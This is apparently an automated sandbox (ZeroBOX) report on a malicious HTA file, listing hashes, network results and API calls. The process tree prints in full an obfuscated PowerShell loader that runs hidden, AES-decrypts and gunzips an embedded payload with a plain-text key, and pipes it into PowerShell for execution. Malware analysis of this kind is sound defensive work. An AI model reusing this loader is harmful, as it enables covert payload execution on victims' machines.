Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	April 18, 2023, 9:51 a.m.	April 18, 2023, 9:54 a.m.

Size	108.0KB
Type	HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5	`1788bf59ef4448b60cab56c45cc7cafe`
SHA256	`eebd45700e2ffa98b0ea01f901f7f03171d6b0142fdd4556352a6707ad3d7d98`
CRC32	`F65F6858`
ssdeep	`1536:/PWANsp5+k/gR8MftoLTrjR8qeMKhfhW6QSqUjMdk/HyXX:/PWxD+2gbto/r98qIhW6QSqUjMm/HyXX`
Yara	None matched

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\paladin.hta
3040
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $czJl = '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';$VhSdGfXz = 'elBmUmlvU01LUVR0YndBZW5CamxHdVBVeXhsSXJFQW8=';$ShArHJOr = New-Object 'System.Security.Cryptography.AesManaged';$ShArHJOr.Mode = [System.Security.Cryptography.CipherMode]::ECB;$ShArHJOr.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$ShArHJOr.BlockSize = 128;$ShArHJOr.KeySize = 256;$ShArHJOr.Key = [System.Convert]::FromBase64String($VhSdGfXz);$GYzdI = [System.Convert]::FromBase64String($czJl);$JdHTpYkG = $GYzdI[0..15];$ShArHJOr.IV = $JdHTpYkG;$MoBZNPmUq = $ShArHJOr.CreateDecryptor();$sGBCqJHNo = $MoBZNPmUq.TransformFinalBlock($GYzdI, 16, $GYzdI.Length - 16);$ShArHJOr.Dispose();$yspwxwL = New-Object System.IO.MemoryStream( , $sGBCqJHNo );$QSeyl = New-Object System.IO.MemoryStream;$FVAMzPkmy = New-Object System.IO.Compression.GzipStream $yspwxwL, ([IO.Compression.CompressionMode]::Decompress);$FVAMzPkmy.CopyTo( $QSeyl );$FVAMzPkmy.Close();$yspwxwL.Close();[byte[]] $CvgAODNo = $QSeyl.ToArray();$TUzGASPG = [System.Text.Encoding]::UTF8.GetString($CvgAODNo);$TUzGASPG | powershell - }
  2196
  - cmd.exe "C:\Windows\system32\cmd.exe" /c powershell.exe $czJl = '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';$VhSdGfXz = 'elBmUmlvU01LUVR0YndBZW5CamxHdVBVeXhsSXJFQW8=';$ShArHJOr = New-Object 'System.Security.Cryptography.AesManaged';$ShArHJOr.Mode = [System.Security.Cryptography.CipherMode]::ECB;$ShArHJOr.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$ShArHJOr.BlockSize = 128;$ShArHJOr.KeySize = 256;$ShArHJOr.Key = [System.Convert]::FromBase64String($VhSdGfXz);$GYzdI = [System.Convert]::FromBase64String($czJl);$JdHTpYkG = $GYzdI[0..15];$ShArHJOr.IV = $JdHTpYkG;$MoBZNPmUq = $ShArHJOr.CreateDecryptor();$sGBCqJHNo = $MoBZNPmUq.TransformFinalBlock($GYzdI, 16, $GYzdI.Length - 16);$ShArHJOr.Dispose();$yspwxwL = New-Object System.IO.MemoryStream( , $sGBCqJHNo );$QSeyl = New-Object System.IO.MemoryStream;$FVAMzPkmy = New-Object System.IO.Compression.GzipStream $yspwxwL, ([IO.Compression.CompressionMode]::Decompress);$FVAMzPkmy.CopyTo( $QSeyl );$FVAMzPkmy.Close();$yspwxwL.Close();[byte[]] $CvgAODNo = $QSeyl.ToArray();$TUzGASPG = [System.Text.Encoding]::UTF8.GetString($CvgAODNo);$TUzGASPG | powershell -
    296
    - powershell.exe powershell.exe $czJl = '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';$VhSdGfXz = 'elBmUmlvU01LUVR0YndBZW5CamxHdVBVeXhsSXJFQW8=';$ShArHJOr = New-Object 'System.Security.Cryptography.AesManaged';$ShArHJOr.Mode = [System.Security.Cryptography.CipherMode]::ECB;$ShArHJOr.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$ShArHJOr.BlockSize = 128;$ShArHJOr.KeySize = 256;$ShArHJOr.Key = [System.Convert]::FromBase64String($VhSdGfXz);$GYzdI = [System.Convert]::FromBase64String($czJl);$JdHTpYkG = $GYzdI[0..15];$ShArHJOr.IV = $JdHTpYkG;$MoBZNPmUq = $ShArHJOr.CreateDecryptor();$sGBCqJHNo = $MoBZNPmUq.TransformFinalBlock($GYzdI, 16, $GYzdI.Length - 16);$ShArHJOr.Dispose();$yspwxwL = New-Object System.IO.MemoryStream( , $sGBCqJHNo );$QSeyl = New-Object System.IO.MemoryStream;$FVAMzPkmy = New-Object System.IO.Compression.GzipStream $yspwxwL, ([IO.Compression.CompressionMode]::Decompress);$FVAMzPkmy.CopyTo( $QSeyl );$FVAMzPkmy.Close();$yspwxwL.Close();[byte[]] $CvgAODNo = $QSeyl.ToArray();$TUzGASPG = [System.Text.Encoding]::UTF8.GetString($CvgAODNo);$TUzGASPG
      2424
    - powershell.exe powershell -
      284

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (18 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 18, 2023, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 18, 2023, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 18, 2023, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 9:51 a.m.	computer_name: TEST22-PC	1	1
